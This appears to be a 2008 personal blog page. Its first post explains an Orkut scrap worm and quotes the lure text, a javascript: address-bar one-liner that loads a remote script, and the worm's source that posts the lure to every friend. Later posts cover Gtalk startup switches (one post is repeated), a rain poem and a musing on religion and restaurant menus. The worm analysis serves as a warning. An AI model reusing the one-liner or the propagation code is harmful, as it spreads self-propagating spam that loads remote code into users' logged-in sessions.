8 Feb 2008

Orkut scripts exposed

I generally do not check out the scripts sent to me in scraps by frens. But this was one script which kept coming to me from different directions...from many various frens who dont know each other. So i thought it must be something worth trying or maybe its a SPAM. So i took a chance and tried it out to my utter amazement. The script did not have any effect on my browser,and thats what made me feel nervous thinking if it had not blown and security policies or exploited any vulnerabilities etc. So i made a search on it and found that the scraps are not only on my scrapbook but on all my friends on my list. So i decided to uncover what this script do behind the scenes.

Javascript files can be nasty piece of code which perform a particular function depending on what it was written for. Its really worth watching out for scripts on Orkut as you never know if that script could land you in jail under IT Act for spreading Trojans or Viruses. These scripts can run from the address bar of the Browser. When you enter a script in the address bar and press enter, the script directs you to another site or link or maybe perform some function the the page. These scripts can also be injected into the server directly. This is called Server Side Include (SSI) attacks and injects the piece of script directly into the server. This is generally done on Guestbooks,Feedback forms etc of a website which directly posts messages to the server.

Heres the scrap:
Here are some cool pic..BY JINESH JAIN.. Just copy the JavaScript, paste it in your address bar and PRESS ENTER
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://tricks80.googlepages.com/20885.user.js';void(0)
trust me, you'll find this pic funny!


The javascript source code:
function SendScrapToAll()
{
var scrapText;
scrapText = "[blue]Here are some cool pic..BY [green]JINESH JAIN[/green].. [blue]Just copy the JavaScript, paste it in your address bar and PRESS ENTER[/blue]" +
""+
"[orange]javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://tricks80.googlepages.com/20885.user.js';void(0)[/orange]"+
""+
"[red]trust me, you'll find thispic funny! [:)] ";
if(c == select.length)
return;
try{
if(select[c].value!="")
{
sendScrap(select[c].value,scrapText);
}
}catch(e){
//Suppressed Exception
} finally {
c = c+ 1;
setTimeout("SendScrapToAll()", 666);
}
}

What the script does?
The script fetches the current logged-on user's friends list from Compose.aspx page, builds AJAX based WebRequests and posts the scrap message to everyone on that list. And if you have more than 150 friends..sending more than 150 messages at a time will make Orkut admin look like SPAMMING and yo might even be blocked for some time to access your orkut account.

Prevention is better than Cure
There is not definite cure for such script injection but you can delete each scrap individually.
Inform your friends about this script and never try such scripts in future even if it maybe tempting.

Courtesy:
Coolwayfarer's Diary
Code Maverick

6 Feb 2008

Life's like that

i like the sound of raining..everything so silent..as in sweet slumber
do you know that if we are high up in the clouds..we wont be hearing the sound of rain..
its the sound of the water falling on the rocks,mountians, roofs,umbrella that we hear rain as
it has a sweet music in itself..have you ever listened to it?
it reflects all the sweet sounds of silence...
the leafs,the ocean,the rooftops...all singing in one tone..in life's unison
washing away all the dirt it had accumulated in all those times of sweet silence...

even if the ends of a needle are opposite to each other...that doensnt mean they are in different worlds...
the sound of rain is in fact a noise ...yet we like to hear it...we are thrilled by its noise...
music only need not be soothing to the ears...its sometimes noise that break all barriers...all silence
life is like that...

5 Feb 2008

Call conference in Gtalk

Gtalk unlike Yahoo messenger or any other IM clients lacks so many interactive features. But you can always manipulate with Gtalk to have these features back. For example, you can have call conference in Gtalk,use icons (not smileys) etc. There are so many themes for Gtalk available on the internet to use. You can set the background image,use cool icons, make sounds like applause in Yahoo messenger etc depending on which Gtalk theme you install. I will be telling only one aspect of Gtalk i.e. call conference. Believe me,i have tested it.

1.)Open Gtalk in one instance
2.)Right click the Gtalk icon on the desktop and open the properties of the Gtalk icon
3.) Add "/nomutex" (without colons) at the end of the target file of Gtalk
4.) It should be like this "C:\Program Files\Google\Google Talk\googletalk.exe" /nomutex.
5.) It will allow you to open multiple instances of Gtalk on your system
6.)Open 2 instances of Gtalk on every computer you wish to conference with.
7.After this start a chain: User 1 should connect on one instance to user 2. User 2 will connect on his second instance to user 3. User 3 will connect using his second instance back to user 1. With this chain everyone is connected to everyone.
Other Secret Startup Parameters
  • /nomutex: allows you to open more than one instance of Google Talk
  • /autostart: when Google Talk is run with this parameter, it will check the registry settings to see if it needs to be started or not. If the "Start automatically with Windows" option is unchecked, it won't start.
  • /forcestart: same as /autostart, but forces it to start no matter what option was set.
  • /S upgrade: Used when upgrading Google Talk
  • /register: registers Google Talk in the registry, includig the GMail Compose method.
  • /checkupdate: check for newer versions
  • /plaintextauth: uses plain authentication mechanism instead then Google's GAIA mechanism. Used for testing the plain method on Google's servers.
  • /nogaiaauth: disables GAIA authentication method. The same as above.
  • /factoryreset: set settings back to default.
  • /gaiaserver servername.com: uses a different GAIA server to connect to Google Talk. Used for debug purposes only, there are no other known GAIA servers.
  • /mailto email@host.com: send an email with Gmail
  • /diag: start Google Talk in diagnostic mode
  • /log: probably has something to do with the diagnostic logging
Courtesy: http://www.customizetalk.com

Call conference in Gtalk

Gtalk unlike Yahoo messenger or any other IM clients lacks so many interactive features. But you can always manipulate with Gtalk to have these features back. For example, you can have call conference in Gtalk,use icons (not smileys) etc. There are so many themes for Gtalk available on the internet to use. You can set the background image,use cool icons, make sounds like applause in Yahoo messenger etc depending on which Gtalk theme you install. I will be telling only one aspect of Gtalk i.e. call conference. Believe me,i have tested it.

1.)Open Gtalk in one instance
2.)Right click the Gtalk icon on the desktop and open the properties of the Gtalk icon
3.) Add "/nomutex" (without colons) at the end of the target file of Gtalk
4.) It should be like this "C:\Program Files\Google\Google Talk\googletalk.exe" /nomutex.
5.) It will allow you to open multiple instances of Gtalk on your system
6.)Open 2 instances of Gtalk on every computer you wish to conference with.
7.After this start a chain: User 1 should connect on one instance to user 2. User 2 will connect on his second instance to user 3. User 3 will connect using his second instance back to user 1. With this chain everyone is connected to everyone.
Other Secret Startup Parameters
  • /nomutex: allows you to open more than one instance of Google Talk
  • /autostart: when Google Talk is run with this parameter, it will check the registry settings to see if it needs to be started or not. If the "Start automatically with Windows" option is unchecked, it won't start.
  • /forcestart: same as /autostart, but forces it to start no matter what option was set.
  • /S upgrade: Used when upgrading Google Talk
  • /register: registers Google Talk in the registry, includig the GMail Compose method.
  • /checkupdate: check for newer versions
  • /plaintextauth: uses plain authentication mechanism instead then Google's GAIA mechanism. Used for testing the plain method on Google's servers.
  • /nogaiaauth: disables GAIA authentication method. The same as above.
  • /factoryreset: set settings back to default.
  • /gaiaserver servername.com: uses a different GAIA server to connect to Google Talk. Used for debug purposes only, there are no other known GAIA servers.
  • /mailto email@host.com: send an email with Gmail
  • /diag: start Google Talk in diagnostic mode
  • /log: probably has something to do with the diagnostic logging
Courtesy: http://www.customizetalk.com

2 Feb 2008

Food based religious sentiments!!

Though Pune is known to be one of the largest exporter of pork in India(read it somewhere), i failed to understand why there were few restaurants which provided pork dishes! I am not against any religion or community as such but a thought just came into my mind. In a restaurant in Pune, no pork dishes are not mentioned in the menu card,though it was available. When i asked the waiter, he replied that it would hurt the religious sentiments of Muslims.

There are hardly one or two places where pork dishes are found whereas there must be some hundreds of hotels that provide beef. Would that be a fair part on hindus then, to include beef dishes on the menu? There is no law as such that such things could be or could not be mentioned in menu,its just a noble gesture of the restaurant owner for the customers not to feel offended.

In the same restaurant, they have beef dishes on the menu (if i remember right!)..so what does that have to do then? My whole point is that maybe hindu people generally don't take it too seriously when it comes to religion (except for some) whereas muslims in general, have a strict code of conduct and religious in nature. And maybe thats why people in general don't find it hard to put up a beef in the menu whereas they don't put pork in the menu! Well,that maybe my observation or my point of view which need not be taken as the truth as such. Take it as just one more comment of another person.


Disclaimer: I seriously dont have any problem or grudge with any religion. All are equal in my eyes.

Disqus

comments powered by Disqus